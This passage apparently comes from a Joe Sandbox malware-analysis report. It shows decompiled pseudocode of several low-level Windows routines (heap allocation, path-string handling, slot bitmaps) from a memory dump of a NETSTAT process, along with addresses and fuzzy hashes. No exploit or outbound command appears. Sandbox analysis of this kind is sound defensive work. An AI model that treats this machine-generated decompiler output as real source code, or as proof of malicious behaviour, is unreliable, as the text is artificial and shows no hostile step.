								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3448774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0335B6F0(0x333c338, 0x333c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03399520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E033995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0336FFB0(_t68, _t77, 0x3448778);
				}
				_pop(_t78);
				return E0339B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                0x033d69b5
                0x033d69be
                0x033d69c3
                0x033d69c9
                0x033d69cc
                0x033d69d1
                0x033d69d3
                0x033d69de
                0x033d69e1
                0x033d69ea
                0x033d69f6
                0x033d69fe
                0x033d6a13
                0x033d6a14
                0x033d6a15
                0x033d6a16
                0x033d6a1e
                0x033d6a26
                0x033d6a31
                0x033d6a36
                0x033d6a37
                0x033d6a40
                0x033d6a49
                0x033d6a4a
                0x033d6a53
                0x033d6a59
                0x033d6a5d
                0x033d6a5e
                0x033d6a64
                0x033d6a67
                0x033d6a6a
                0x033d6a6d
                0x033d6a70
                0x033d6a77
                0x033d6a7d
                0x033d6a86
                0x033d6a89
                0x033d6a9c
                0x033d6a9f
                0x033d6aa2
                0x033d6aa5
                0x033d6aaf
                0x033d6ab1
                0x033d6ab8
                0x033d6ab9
                0x033d6abb
                0x033d6abe
                0x033d6ac5
                0x033d6ac5
                0x033d6aaf
                0x033d6a40
                0x033d6a26
                0x033d69fe
                0x033d6ace
                0x033d6ad0
                0x033d6ad3
                0x033d6ad8
                0x033d6adf
                0x033d6adf
                0x033d6ae8
                0x033d6aef
                0x033d6aef
                0x033d6af9
                0x033d6b06

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f4629796051c0b6745c98a73a53ffc471ddf523e9255d8f9ecb4fb386d0e7d2
                • Instruction ID: a112e3421d6735dba2dea8732eb3117c3cb0d3a0908106c340b151930ee798de
                • Opcode Fuzzy Hash: 0f4629796051c0b6745c98a73a53ffc471ddf523e9255d8f9ecb4fb386d0e7d2
                • Instruction Fuzzy Hash: 95415EB6E003089FDB14DFA5D981BAEFBF8EF48714F14812AE854AB250DB759905CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03355210 Relevance: .1, Instructions: 107COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E03355210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E033552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E033995D0();
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0336EB70(_t54, 0x34479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E033995D0();
								L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0336EB70(_t54, 0x34479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0339F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0336EB70(_t54, 0x34479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E033995D0();
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                0x03355220
                0x03355224
                0x033b0d13
                0x033b0d16
                0x033b0d19
                0x0335522a
                0x0335522a
                0x0335522d
                0x0335522d
                0x03355231
                0x03355235
                0x03355239
                0x033b0d5c
                0x033b0d62
                0x00000000
                0x00000000
                0x033b0d6a
                0x033b0d7b
                0x033b0d7f
                0x033b0d81
                0x033b0d84
                0x033b0d95
                0x033b0d95
                0x033b0d6c
                0x033b0d71
                0x033b0d71
                0x033b0d9a
                0x00000000
                0x0335524a
                0x0335524a
                0x03355250
                0x033b0d24
                0x033b0d35
                0x033b0d39
                0x033b0d3b
                0x033b0d3e
                0x033b0d50
                0x033b0d50
                0x033b0d26
                0x033b0d2b
                0x033b0d2b
                0x00000000
                0x033b0d55
                0x03355256
                0x0335525b
                0x03355265
                0x033b0da7
                0x0335526b
                0x0335526e
                0x03355272
                0x033b0db1
                0x033b0db4
                0x033b0dc5
                0x033b0dc5
                0x03355272
                0x03355278
                0x0335527e
                0x0335528a
                0x0335528c
                0x0335528d
                0x00000000
                0x03355280
                0x03355282
                0x03355288
                0x0335529f
                0x03355292
                0x00000000
                0x03355292
                0x00000000
                0x03355288
                0x0335527e

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ee7e5f9297228b42528d008e89f5f9631bffdd76031620de2eb104ab359b801a
                • Instruction ID: 84973409676de8abd392b56729a58dbdd7d3965044e48a268eea22ee8f030afc
                • Opcode Fuzzy Hash: ee7e5f9297228b42528d008e89f5f9631bffdd76031620de2eb104ab359b801a
                • Instruction Fuzzy Hash: 7831A031A51700EBDB25DB18CDC0FAAB779AF007A0F15462EF9564B9A0E760F841C790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338A61C Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E0338A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3430220);
				E033AD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3447b9c; // 0x0
				_t55 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E033AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3447b10 =  *0x3447b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x344536c; // 0xb33ff0
					if( *_t51 != 0x3445368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3445368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x344536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0338A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                0x0338a61c
                0x0338a61e
                0x0338a623
                0x0338a628
                0x0338a62b
                0x0338a62d
                0x0338a648
                0x0338a64a
                0x0338a64f
                0x033c9b44
                0x0338a6ec
                0x0338a6f1
                0x0338a6f1
                0x0338a655
                0x0338a657
                0x0338a65a
                0x0338a65d
                0x0338a662
                0x0338a663
                0x0338a667
                0x0338a668
                0x0338a66d
                0x0338a706
                0x0338a706
                0x033c9bda
                0x033c9be6
                0x033c9beb
                0x00000000
                0x033c9beb
                0x0338a679
                0x033c9b7a
                0x00000000
                0x033c9b7a
                0x0338a683
                0x0338a6f4
                0x0338a6f7
                0x0338a6f9
                0x0338a6fd
                0x0338a6a0
                0x0338a6a0
                0x0338a6ad
                0x0338a6af
                0x0338a6b4
                0x033c9ba7
                0x033c9bac
                0x00000000
                0x00000000
                0x033c9bc6
                0x033c9bce
                0x033c9bd1
                0x033c9bd3
                0x033c9bd3
                0x00000000
                0x033c9bd1
                0x0338a6bd
                0x0338a6c3
                0x0338a6c6
                0x0338a6d2
                0x0338a701
                0x0338a704
                0x00000000
                0x0338a704
                0x0338a6d4
                0x0338a6d6
                0x0338a6d9
                0x0338a6db
                0x0338a6e1
                0x0338a6e6
                0x0338a6e8
                0x0338a6e8
                0x0338a6ea
                0x00000000
                0x0338a6ea
                0x0338a688
                0x0338a692
                0x0338a694
                0x0338a699
                0x00000000
                0x00000000
                0x0338a69d
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc45d8d14c81f84ad6d24f8a10d12321ec8e4c3be8340368f7363126113f1313
                • Instruction ID: 4416f80b6275d0f539ed77d0c8c8f641e2aef573cee0d6daaf632b6f866a3db4
                • Opcode Fuzzy Hash: fc45d8d14c81f84ad6d24f8a10d12321ec8e4c3be8340368f7363126113f1313
                • Instruction Fuzzy Hash: 224159B9A10345DFCB15DF58C890BA9BBF1FB49704F1981AAE814AF348D778AD01DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03393D43 Relevance: .1, Instructions: 106COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03393D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03367B60(0, _t61, 0x33311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03367B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03374620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                0x03393d4c
                0x03393d50
                0x03393d55
                0x03393d5e
                0x033ce79a
                0x00000000
                0x033ce79a
                0x03393d68
                0x033ce789
                0x03393d9d
                0x03393da3
                0x03393daf
                0x03393db5
                0x03393dbc
                0x03393dc4
                0x03393dc9
                0x03393dce
                0x033ce7ae
                0x033ce7ae
                0x03393dde
                0x03393de2
                0x03393de7
                0x03393e0d
                0x03393e13
                0x03393e16
                0x03393e1e
                0x03393e25
                0x03393e28
                0x00000000
                0x00000000
                0x03393e2a
                0x03393e2f
                0x03393e37
                0x03393e37
                0x00000000
                0x03393e37
                0x03393e31
                0x00000000
                0x03393e31
                0x03393e20
                0x03393e20
                0x03393e35
                0x00000000
                0x03393de9
                0x03393de9
                0x03393de9
                0x03393dee
                0x03393dfd
                0x03393dff
                0x03393e02
                0x03393e05
                0x03393e05
                0x00000000
                0x03393df0
                0x03393de7
                0x033ce78f
                0x033ce794
                0x03393d79
                0x03393d84
                0x03393d89
                0x03393d8e
                0x00000000
                0x033ce7a4
                0x03393d96
                0x03393d9a
                0x00000000
                0x03393d9a
                0x00000000
                0x033ce794
                0x03393d6e
                0x03393d73
                0x00000000
                0x033ce7b5
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f76c180f7832eed26e9d07c7a23078fe2ee99d21d275fc850ec23226fcb6d720
                • Instruction ID: 811041e31d23ae12c316c61ab7d5c07c409ce2dc54ea9e8fadf6f79e8a8c2891
                • Opcode Fuzzy Hash: f76c180f7832eed26e9d07c7a23078fe2ee99d21d275fc850ec23226fcb6d720
                • Instruction Fuzzy Hash: 8731AFBAA15614DFEB34CF29C8D1A6BBBE9EF45720709806EE845CB760E730D840C791
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337C182 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E0337C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03377D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03428D34(_v8, _t80);
					}
					E03372280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0336FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03428833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0336FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0339B180();
						if(_a4 != 0) {
							E03372280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0337BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0337BB2D(_t16, _t15);
						E0337B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0336FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0336FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0336FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                0x0337c18d
                0x0337c18f
                0x0337c191
                0x0337c19b
                0x0337c1a0
                0x0337c1d4
                0x0337c1de
                0x033c2d6e
                0x0337c1e4
                0x0337c1e4
                0x0337c1e4
                0x0337c1ec
                0x033c2d7d
                0x033c2d7d
                0x0337c1f3
                0x0337c1ff
                0x033c2d88
                0x033c2d8d
                0x033c2d94
                0x033c2d94
                0x033c2d9f
                0x033c2da4
                0x033c2dab
                0x033c2db0
                0x033c2db2
                0x033c2db3
                0x033c2db4
                0x033c2dbc
                0x033c2dc3
                0x033c2dc3
                0x0337c205
                0x0337c205
                0x0337c208
                0x0337c20e
                0x0337c211
                0x0337c216
                0x0337c219
                0x0337c21f
                0x0337c222
                0x0337c22c
                0x0337c234
                0x0337c23a
                0x0337c23f
                0x0337c245
                0x0337c24b
                0x0337c251
                0x0337c25a
                0x0337c276
                0x0337c27d
                0x0337c27d
                0x0337c25c
                0x0337c25c
                0x00000000
                0x0337c25e
                0x0337c1a4
                0x0337c1aa
                0x0337c1b3
                0x0337c265
                0x0337c26c
                0x0337c26c
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                • Instruction ID: f85d2610e9a60aaa7e0c958a1bbbb528e19a91625a05667f032dd28da1e062c2
                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                • Instruction Fuzzy Hash: 2D313E76A01646BEDB14EBB4C8D0BEAF768BF42104F08916AD41C9F201DB3C5945DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 033D7016 Relevance: .1, Instructions: 104COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E033D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x344d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E033D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E033D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03377D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03399AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0339B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03374620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                0x033d7016
                0x033d701e
                0x033d702b
                0x033d7033
                0x033d7037
                0x033d703c
                0x033d703e
                0x033d7041
                0x033d7045
                0x033d704a
                0x033d7050
                0x033d7055
                0x033d705a
                0x033d7062
                0x033d7062
                0x033d705a
                0x033d7064
                0x033d7064
                0x033d7067
                0x033d7071
                0x033d7096
                0x033d709b
                0x033d70a2
                0x033d70a6
                0x033d70a7
                0x033d70ad
                0x033d70b3
                0x033d70b6
                0x033d70bb
                0x033d70c3
                0x033d70c3
                0x033d70c6
                0x033d70cd
                0x033d70dd
                0x033d70e0
                0x033d70e2
                0x033d70e2
                0x033d70ee
                0x033d7101
                0x033d70f0
                0x033d70f9
                0x033d70f9
                0x033d710a
                0x033d710e
                0x033d7112
                0x033d7117
                0x033d7118
                0x033d7118
                0x033d70bb
                0x033d711d
                0x033d7123
                0x033d7131
                0x033d7131
                0x033d7136
                0x033d713d
                0x033d713e
                0x033d713f
                0x033d714a
                0x033d714a
                0x033d7084
                0x033d7088
                0x00000000
                0x033d708e
                0x033d708e
                0x033d7092
                0x00000000
                0x033d7092

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0ce6e10501658a218415ac0a2c77030afa07e3232ba3029bad5a38237cc5b044
                • Instruction ID: 410151cf9cac4bdae735646c8b0c253e88b9376f3a1b4de233794457b16118a5
                • Opcode Fuzzy Hash: 0ce6e10501658a218415ac0a2c77030afa07e3232ba3029bad5a38237cc5b044
                • Instruction Fuzzy Hash: 9B31A476A047519FC320DF68DD81A6AB7E9FF88700F084A29F8959B690E734E904C7A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338A70E Relevance: .1, Instructions: 96COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0338A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3447b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3447b10 = 8;
					 *0x3447b14 = 0x3447b0c;
					 *0x3447b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0338A990(0x3447b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0338A840(__edx, __ecx, __ecx, _t52, 0x3447b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3447b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x3447b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3447b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03374620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3447b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0339F3E0(_t50,  *0x3447b14, _t8 >> 3);
						_t28 =  *0x3447b14; // 0x77e07b0c
						__eflags = _t28 - 0x3447b0c;
